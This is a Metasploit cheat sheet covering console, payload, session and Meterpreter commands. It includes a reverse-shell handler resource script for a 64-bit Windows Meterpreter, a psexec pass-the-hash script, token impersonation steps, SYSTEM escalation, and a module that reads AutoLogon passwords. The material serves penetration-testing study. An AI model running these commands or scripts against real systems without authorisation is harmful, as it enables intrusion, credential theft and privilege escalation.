Metasploit Framework (MSF)
Metasploit: the world’s most used penetration testing framework.

Start

Start the database (optional, but search, workspaces and stored loot/creds need it):

    msfdb start

or

    systemctl start postgresql

On a fresh install the database has to be initialised once (msfdb init) before it can be started.

Start the Metasploit Framework console:

    msfconsole

Exploits

Select an exploit (tab completion works on module paths):

    use <exploit>

Run the selected exploit:

    run

or

    exploit

Options

Show the options of the current module (required ones are marked yes):

    show options

Show advanced options (e.g. ExitOnSession, AutoRunScript):

    show advanced

Set an option for the current module:

    set <option> <value>

Set an option globally, so every module selected later inherits it (typically LHOST and LPORT):

    setg <option> <value>

Payloads

Show the payloads compatible with the current module:

    show payloads

Select a payload (reverse payloads need LHOST and LPORT set afterwards, bind payloads only LPORT):

    set payload <payload>

Sessions

List sessions:

    sessions -l

Interact with a session:

    sessions -i <number>

Send the current session to the background (Ctrl+Z does the same):

    background

Meterpreter

The shell command drops into a standard OS shell (cmd.exe or /bin/sh) on the target; type exit to return to Meterpreter:

    shell

getsystem is a command from Meterpreter's priv extension that tries several techniques (named-pipe impersonation, token duplication) to obtain SYSTEM on a Windows target. It only works from an already privileged context (local administrator or SeImpersonatePrivilege), so verify the result with getuid afterwards:

    getsystem

Encoders

List available encoders:

    show encoders

Select an encoder for the current module's payload. Encoders exist to fit a payload into exploit constraints (bad characters, size); they are not an antivirus evasion mechanism:

    set encoder <encoder>

Misc

Search modules by name, CVE, platform or type (e.g. search type:exploit platform:windows smb):

    search <term>

Leave the current module:

    back

Display help for the console (help <command> shows one command's flags):

    help

Get info about the current module (description, options, targets, references):

    info

List auxiliary modules (scanners, brute-forcers, servers):

    show auxiliary

Multi/handler

Start a listener only, for a payload you deliver yourself (e.g. one built with msfvenom). Set the same payload, LHOST and LPORT that the delivered payload was built with:

    use exploit/multi/handler
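A complete handler resource script, added to this cheat sheet as an example (it is not from the original page). It assumes a 64-bit Windows Meterpreter reverse-TCP payload and uses 10.10.14.2 and port 443 as placeholder listener address and port; run it with msfconsole -q -r handler.rc and check the result with jobs and sessions -l:

```text
# handler.rc - start a persistent multi/handler as a background job
# (example for this cheat sheet; LHOST/LPORT/PAYLOAD are placeholders)
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 443
# keep listening after the first session connects instead of exiting
set ExitOnSession false
# move each new session out of its initial process automatically
set AutoRunScript post/windows/manage/smart_migrate
# -j runs the handler as a job, -z does not drop into the first session
exploit -j -z
```

Without ExitOnSession false the handler stops after the first callback, which is the usual reason a second implant never shows up in sessions -l.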

Jobs

Run the current module as a background job (e.g. a handler that should keep listening while you work; exploit -j is equivalent):

    run -j

List jobs (jobs -k <id> kills one):

    jobs

Post exploitation

Post modules run against an existing session: set SESSION <id> (and check show options) before running them.

This module checks a session for local exploits, mostly privilege escalation, that are likely to work on that host:

    use post/multi/recon/local_exploit_suggester

This module reads the plaintext AutoLogon password (DefaultPassword under the Winlogon registry key) from the Windows registry:

    use post/windows/gather/credentials/windows_autologin

This module logs in with the specified username/password and executes the supplied command as a hidden process:

    use post/windows/manage/run_as

Meterpreter session

Upgrade a plain shell session to a Meterpreter session (set SESSION and LHOST; the console shortcut sessions -u <id> does the same):

    use post/multi/manage/shell_to_meterpreter

Migrate to another (e.g. more stable or longer-lived) process. A 32-bit Meterpreter cannot migrate into 64-bit processes, so check sysinfo first:

    migrate <pid>

Get system info (OS, architecture, domain, Meterpreter architecture):

    sysinfo

Port forwarding: expose a port of a host reachable from the target on a local port. -l is the local listening port, -r the remote host as seen from the target, -p the port on that host (use -r 127.0.0.1 to reach services bound to the target's own loopback):

    portfwd add -l <local-port> -p <remote-port> -r <remote-host>

Impersonation (Windows)

Look for privileges such as SeImpersonatePrivilege or SeDebugPrivilege. This is a Windows command, so run it from a Meterpreter shell on the target (Meterpreter's own getprivs lists the same):

    whoami /priv

Load the incognito extension and list the tokens available to the current process, grouped by group:

    load incognito
    list_tokens -g

Impersonate e.g. BUILTIN\Administrators (the backslash must be doubled in the Meterpreter console):

    impersonate_token "BUILTIN\\Administrators"

An impersonation token only applies to the thread Meterpreter runs in and not every operation honours it, so holding the token is not the same as having the rights (token != permission). To actually run with the elevated rights, migrate into a process that already runs under that account, picked from ps:

    ps
    migrate <pid>

Resource Scripts

Resource scripts (.rc files: one console command per line, # starts a comment) automate repetitive setup in Metasploit. Run one at startup with:

    msfconsole -r demo.rc

or from inside the console with resource demo.rc.

demo.rc

    # psexec: run a payload on a host over SMB with administrator credentials
    use exploit/windows/smb/psexec
    set rhost <ip>
    set smbuser Administrator
    # a password, or for pass-the-hash the LM:NTLM pair
    # (aad3b435b51404eeaad3b435b51404ee:<ntlm-hash> when LM is empty)
    set smbpass <hash-or-password>
    # for a local account leave the default (.) instead of a domain
    set smbdomain <domain>
    set payload windows/meterpreter/reverse_tcp
    # migrate each new session out of the service process automatically
    set AutoRunScript post/windows/manage/smart_migrate
    # global, so a later multi/handler reuses the same listener settings
    setg lport 443
    setg lhost <own-ip>

The script only configures the module; type exploit afterwards (or append it as the last line) to launch. Note that psexec installs and starts a Windows service on the target, which leaves service-creation events in the System event log and is easy to detect.